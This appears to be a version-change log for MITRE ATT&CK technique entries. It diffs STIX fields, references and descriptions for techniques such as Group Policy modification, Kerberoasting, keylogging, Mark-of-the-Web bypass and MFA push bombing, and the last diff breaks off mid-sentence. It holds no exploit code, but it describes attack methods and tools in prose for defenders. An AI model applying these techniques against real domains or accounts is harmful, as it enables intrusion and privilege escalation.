descriptionAdversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) For example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs) For example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)
external_references[1]['source_name']TechNet Group Policy BasicsMandiant M Trends 2016
external_references[1]['description']srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.
external_references[1]['url']https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
external_references[3]['source_name']Wald0 Guide to GPOsMicrosoft Hacking Team Breach
external_references[3]['description']Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019.Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.
external_references[3]['url']https://wald0.com/?p=179https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/
external_references[4]['source_name']Harmj0y Abusing GPO PermissionsWald0 Guide to GPOs
external_references[4]['description']Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019.
external_references[4]['url']http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/https://wald0.com/?p=179
external_references[5]['source_name']Mandiant M Trends 2016Harmj0y Abusing GPO Permissions
external_references[5]['description']Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.
external_references[5]['url']https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdfhttp://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
external_references[6]['source_name']Microsoft Hacking Team BreachHarmj0y SeEnableDelegationPrivilege Right
external_references[6]['description']Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
external_references[6]['url']https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
external_references[7]['source_name']Harmj0y SeEnableDelegationPrivilege RightTechNet Group Policy Basics
external_references[7]['description']Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved March 5, 2019.srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.
external_references[7]['url']http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
x_mitre_data_sources[0]Active Directory: Active Directory Object CreationActive Directory: Active Directory Object Modification
x_mitre_data_sources[1]Command: Command ExecutionActive Directory: Active Directory Object Deletion
x_mitre_data_sources[2]Active Directory: Active Directory Object DeletionActive Directory: Active Directory Object Creation
x_mitre_data_sources[3]Active Directory: Active Directory Object ModificationCommand: Command Execution

[T1200] Hardware Additions

Current version: 1.6

Dropped Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-28 16:09:12.782000+00:002023-03-30 21:01:40.332000+00:00
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/440.html', 'external_id': 'CAPEC-440'}

[T1562.003] Impair Defenses: Impair Command History Logging

Current version: 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-01 20:48:29.785000+00:002023-03-30 21:01:47.940000+00:00
x_mitre_data_sources[0]Sensor Health: Host StatusCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionSensor Health: Host Status
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/13.html', 'external_id': 'CAPEC-13'}

[T1056] Input Capture

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesTinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-569
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:05:20.658000+00:002023-03-30 21:01:41.752000+00:00
external_references[1]['source_name']capecAdventures of a Keystroke
external_references[1]['url']https://capec.mitre.org/data/definitions/569.htmlhttp://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
x_mitre_data_sources[1]Process: Process CreationDriver: Driver Load
x_mitre_data_sources[5]Process: Process MetadataProcess: Process Creation
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Metadata
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Adventures of a Keystroke', 'description': 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.', 'url': 'http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf'}
x_mitre_data_sourcesDriver: Driver Load

[T1553.004] Subvert Trust Controls: Install Root Certificate

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesWikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-479
values_changed
STIX FieldOld valueNew Value
modified2021-08-25 19:39:07.001000+00:002023-03-30 21:01:45.661000+00:00
external_references[1]['source_name']capecWikipedia Root Certificate
external_references[1]['url']https://capec.mitre.org/data/definitions/479.htmlhttps://en.wikipedia.org/wiki/Root_certificate
external_references[2]['source_name']Wikipedia Root CertificateOperation Emmental
external_references[2]['description']Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.
external_references[2]['url']https://en.wikipedia.org/wiki/Root_certificatehttp://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf
external_references[3]['source_name']Operation EmmentalKaspersky Superfish
external_references[3]['description']Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.
external_references[3]['url']http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdfhttps://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/
external_references[4]['source_name']Kaspersky SuperfishSpectorOps Code Signing Dec 2017
external_references[4]['description']Onuma. (2015, February 24). Superfish: Adware Preinstalled on Lenovo Laptops. Retrieved February 20, 2017.Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.
external_references[4]['url']https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
external_references[5]['source_name']SpectorOps Code Signing Dec 2017objective-see ay mami 2018
external_references[5]['description']Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.
external_references[5]['url']https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6echttps://objective-see.com/blog/blog_0x26.html
external_references[6]['source_name']objective-see ay mami 2018Microsoft Sigcheck May 2017
external_references[6]['description']Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.
external_references[6]['url']https://objective-see.com/blog/blog_0x26.htmlhttps://docs.microsoft.com/sysinternals/downloads/sigcheck
external_references[7]['source_name']Microsoft Sigcheck May 2017Tripwire AppUNBlocker
external_references[7]['description']Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.
external_references[7]['url']https://docs.microsoft.com/sysinternals/downloads/sigcheckhttps://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/
x_mitre_data_sources[0]Process: Process CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[3]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Tripwire AppUNBlocker', 'description': 'Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.', 'url': 'https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/'}

[T1558.003] Steal or Forge Kerberos Tickets: Kerberoasting

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesEmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-509
values_changed
STIX FieldOld valueNew Value
modified2022-03-08 21:52:42.405000+00:002023-03-30 21:01:46.538000+00:00
external_references[1]['source_name']capecEmpire InvokeKerberoast Oct 2016
external_references[1]['url']https://capec.mitre.org/data/definitions/509.htmlhttps://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
external_references[2]['source_name']Empire InvokeKerberoast Oct 2016AdSecurity Cracking Kerberos Dec 2015
external_references[2]['description']EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved March 22, 2018.Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.
external_references[2]['url']https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1https://adsecurity.org/?p=2293
external_references[3]['source_name']AdSecurity Cracking Kerberos Dec 2015Microsoft Detecting Kerberoasting Feb 2018
external_references[3]['description']Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.
external_references[3]['url']https://adsecurity.org/?p=2293https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
external_references[4]['source_name']Microsoft Detecting Kerberoasting Feb 2018Microsoft SPN
external_references[4]['description']Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.
external_references[4]['url']https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/https://msdn.microsoft.com/library/ms677949.aspx
external_references[5]['source_name']Microsoft SPNMicrosoft SetSPN
external_references[5]['description']Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.
external_references[5]['url']https://msdn.microsoft.com/library/ms677949.aspxhttps://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
external_references[6]['source_name']Microsoft SetSPNSANS Attacking Kerberos Nov 2014
external_references[6]['description']Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN Syntax (Setspn.exe). Retrieved March 22, 2018.Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.
external_references[6]['url']https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspxhttps://redsiege.com/kerberoast-slides
external_references[7]['source_name']SANS Attacking Kerberos Nov 2014Harmj0y Kerberoast Nov 2016
external_references[7]['description']Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.
external_references[7]['url']https://redsiege.com/kerberoast-slideshttps://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Harmj0y Kerberoast Nov 2016', 'description': 'Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.', 'url': 'https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/'}

[T1056.001] Input Capture: Keylogging

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesTinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-568
values_changed
STIX FieldOld valueNew Value
modified2020-10-21 01:30:56.227000+00:002023-03-30 21:01:37.930000+00:00
external_references[1]['source_name']capecAdventures of a Keystroke
external_references[1]['url']https://capec.mitre.org/data/definitions/568.htmlhttp://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
external_references[2]['source_name']Adventures of a KeystrokeCisco Blog Legacy Device Attacks
external_references[2]['description']Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.
external_references[2]['url']http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdfhttps://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Cisco Blog Legacy Device Attacks', 'description': 'Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.', 'url': 'https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954'}
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification

[T1543.004] Create or Modify System Process: Launch Daemon

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesApple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.
external_referencesPatrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-550
external_referencesCAPEC-551
values_changed
STIX FieldOld valueNew Value
modified2021-10-07 22:10:55.653000+00:002023-03-30 21:01:48.453000+00:00
external_references[1]['source_name']capecAppleDocs Launch Agent Daemons
external_references[1]['url']https://capec.mitre.org/data/definitions/550.htmlhttps://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
external_references[2]['source_name']capecMethods of Mac Malware Persistence
external_references[2]['url']https://capec.mitre.org/data/definitions/551.htmlhttps://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
external_references[3]['source_name']AppleDocs Launch Agent Daemonslaunchd Keywords for plists
external_references[3]['description']Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.
external_references[3]['url']https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.htmlhttps://www.real-world-systems.com/docs/launchdPlist.1.html
external_references[4]['source_name']Methods of Mac Malware PersistenceWireLurker
external_references[4]['description']Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.
external_references[4]['url']https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdfhttps://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf
external_references[5]['source_name']launchd Keywords for plistsOSX Malware Detection
external_references[5]['description']Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.
external_references[5]['url']https://www.real-world-systems.com/docs/launchdPlist.1.htmlhttps://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
external_references[6]['source_name']WireLurkerLaunchDaemon Hijacking
external_references[6]['description']Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.
external_references[6]['url']https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdfhttps://bradleyjkemp.dev/post/launchdaemon-hijacking/
external_references[7]['source_name']OSX Malware Detectionsentinelone macos persist Jun 2019
external_references[7]['description']Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.
external_references[7]['url']https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdfhttps://www.sentinelone.com/blog/how-malware-persists-on-macos/
x_mitre_data_sources[1]File: File ModificationService: Service Creation
x_mitre_data_sources[2]Service: Service ModificationFile: File Creation
x_mitre_data_sources[4]File: File CreationService: Service Modification
x_mitre_data_sources[5]Service: Service CreationFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'LaunchDaemon Hijacking', 'description': 'Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.', 'url': 'https://bradleyjkemp.dev/post/launchdaemon-hijacking/'}
external_references{'source_name': 'sentinelone macos persist Jun 2019', 'description': 'Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.', 'url': 'https://www.sentinelone.com/blog/how-malware-persists-on-macos/'}

[T1553.005] Subvert Trust Controls: Mark-of-the-Web Bypass

Current version: 1.1


Old Description
New Description
t1Adversaries may abuse specific file formats to subvert Mark-t1Adversaries may abuse specific file formats to subvert Mark-
>of-the-Web (MOTW) controls. In Windows, when files are downl>of-the-Web (MOTW) controls. In Windows, when files are downl
>oaded from the Internet, they are tagged with a hidden NTFS >oaded from the Internet, they are tagged with a hidden NTFS 
>Alternate Data Stream (ADS) named <code>Zone.Identifier</cod>Alternate Data Stream (ADS) named <code>Zone.Identifier</cod
>e> with a specific value known as the MOTW.(Citation: Micros>e> with a specific value known as the MOTW.(Citation: Micros
>oft Zone.Identifier 2020) Files that are tagged with MOTW ar>oft Zone.Identifier 2020) Files that are tagged with MOTW ar
>e protected and cannot perform certain actions. For example,>e protected and cannot perform certain actions. For example,
> starting in MS Office 10, if a MS Office file has the MOTW,> starting in MS Office 10, if a MS Office file has the MOTW,
> it will open in Protected View. Executables tagged with the> it will open in Protected View. Executables tagged with the
> MOTW will be processed by Windows Defender SmartScreen that> MOTW will be processed by Windows Defender SmartScreen that
> compares files with an allowlist of well-known executables.> compares files with an allowlist of well-known executables.
> If the file in not known/trusted, SmartScreen will prevent > If the file is not known/trusted, SmartScreen will prevent 
>the execution and warn the user not to run it.(Citation: Bee>the execution and warn the user not to run it.(Citation: Bee
>k Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citatio>k Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citatio
>n: Intezer Russian APT Dec 2020)  Adversaries may abuse cont>n: Intezer Russian APT Dec 2020)  Adversaries may abuse cont
>ainer files such as compressed/archive (.arj, .gzip) and/or >ainer files such as compressed/archive (.arj, .gzip) and/or 
>disk image (.iso, .vhd) file formats to deliver malicious pa>disk image (.iso, .vhd) file formats to deliver malicious pa
>yloads that may not be tagged with MOTW. Container files dow>yloads that may not be tagged with MOTW. Container files dow
>nloaded from the Internet will be marked with MOTW but the f>nloaded from the Internet will be marked with MOTW but the f
>iles within may not inherit the MOTW after the container fil>iles within may not inherit the MOTW after the container fil
>es are extracted and/or mounted. MOTW is a NTFS feature and >es are extracted and/or mounted. MOTW is a NTFS feature and 
>many container files do not support NTFS alternative data st>many container files do not support NTFS alternative data st
>reams. After a container file is extracted and/or mounted, t>reams. After a container file is extracted and/or mounted, t
>he files contained within them may be treated as local files>he files contained within them may be treated as local files
> on disk and run without protections.(Citation: Beek Use of > on disk and run without protections.(Citation: Beek Use of 
>VHD Dec 2020)(Citation: Outflank MotW 2020)>VHD Dec 2020)(Citation: Outflank MotW 2020)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 04:59:32.535000+00:002023-03-22 14:19:50.768000+00:00
descriptionAdversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020) Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020) Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]File: File CreationFile: File Metadata
x_mitre_data_sources[1]File: File MetadataFile: File Creation

[T1036.005] Masquerading: Match Legitimate Name or Location

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 04:56:50.197000+00:002023-03-30 21:01:42.277000+00:00
x_mitre_data_sources[1]Image: Image MetadataProcess: Process Metadata
x_mitre_data_sources[2]Process: Process MetadataImage: Image Metadata
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/177.html', 'external_id': 'CAPEC-177'}

[T1556.006] Modify Authentication Process: Multi-Factor Authentication

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 19:19:07.519000+00:002023-02-09 14:18:59.080000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]User Account: User Account ModificationUser Account: User Account Authentication
x_mitre_data_sources[1]User Account: User Account AuthenticationUser Account: User Account Modification
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsMuhammad Moiz Arshad, @5T34L7H

[T1621] Multi-Factor Authentication Request Generation

Current version: 1.0


Old Description
New Description
t1Adversaries may attempt to bypass multi-factor authenticatiot1Adversaries may attempt to bypass multi-factor authenticatio
>n (MFA) mechanisms and gain access to accounts by generating>n (MFA) mechanisms and gain access to accounts by generating
> MFA requests sent to users.  Adversaries in possession cred> MFA requests sent to users.  Adversaries in possession of c
>entials to [Valid Accounts](https://attack.mitre.org/techniq>redentials to [Valid Accounts](https://attack.mitre.org/tech
>ues/T1078) may be unable to complete the login process if th>niques/T1078) may be unable to complete the login process if
>ey lack access to the 2FA or MFA mechanisms required as an a> they lack access to the 2FA or MFA mechanisms required as a
>dditional credential and security control. To circumvent thi>n additional credential and security control. To circumvent 
>s, adversaries may abuse the automatic generation of push no>this, adversaries may abuse the automatic generation of push
>tifications to MFA services such as Duo Push, Microsoft Auth> notifications to MFA services such as Duo Push, Microsoft A
>enticator, Okta, or similar services to have the user grant >uthenticator, Okta, or similar services to have the user gra
>access to their account.  In some cases, adversaries may con>nt access to their account.  In some cases, adversaries may 
>tinuously repeat login attempts in order to bombard users wi>continuously repeat login attempts in order to bombard users
>th MFA push notifications, SMS messages, and phone calls, po> with MFA push notifications, SMS messages, and phone calls,
>tentially resulting in the user finally accepting the authen> potentially resulting in the user finally accepting the aut
